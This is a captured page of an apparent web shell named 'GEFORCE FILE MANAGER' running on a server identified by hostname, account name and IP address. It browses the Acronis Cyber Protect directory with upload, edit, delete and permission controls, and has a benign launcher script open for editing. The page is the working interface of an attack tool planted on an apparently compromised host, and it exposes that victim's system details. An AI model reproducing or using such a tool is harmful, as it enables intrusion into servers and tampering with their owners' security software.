[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
Acronis
/
CPS
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 cyber-protect-service
718,688 B
SET
[ EDIT ]
|
[ DEL ]
📄 cyber-protect-service.cfg
350 B
SET
[ EDIT ]
|
[ DEL ]
📄 cyber-protect-service.sh
325 B
SET
[ EDIT ]
|
[ DEL ]
📄 fips.so
2,374,568 B
SET
[ EDIT ]
|
[ DEL ]
📄 fipsmodule.cnf
228 B
SET
[ EDIT ]
|
[ DEL ]
📄 libcrtti-ctrl.so
886,048 B
SET
[ EDIT ]
|
[ DEL ]
📄 libcrypto.so.3
5,858,592 B
SET
[ EDIT ]
|
[ DEL ]
📄 libssl.so.3
1,061,000 B
SET
[ EDIT ]
|
[ DEL ]
📄 libssp.so.0
44,104 B
SET
[ EDIT ]
|
[ DEL ]
📄 minidump_parser
1,246,368 B
SET
[ EDIT ]
|
[ DEL ]
📄 openssl
949,048 B
SET
[ EDIT ]
|
[ DEL ]
📄 openssl.cnf
173 B
SET
[ EDIT ]
|
[ DEL ]
📄 openssl_fips.cnf
290 B
SET
[ EDIT ]
|
[ DEL ]
📄 openssl_nofips.cnf
173 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: cyber-protect-service.sh
#!/bin/bash -ux DIRNAME="$(dirname "${0}")" BASENAME="$(basename "${0}" .sh)" # # Note: The following setting are for 'debugging' not for 'production' # # in case of 'crash' we need 'coredump' for investigation #ulimit -c unlimited #sysctl -w 'kernel.core_pattern=/tmp/core-%e.%p.%h.%t' exec "${DIRNAME}/${BASENAME}" "$@"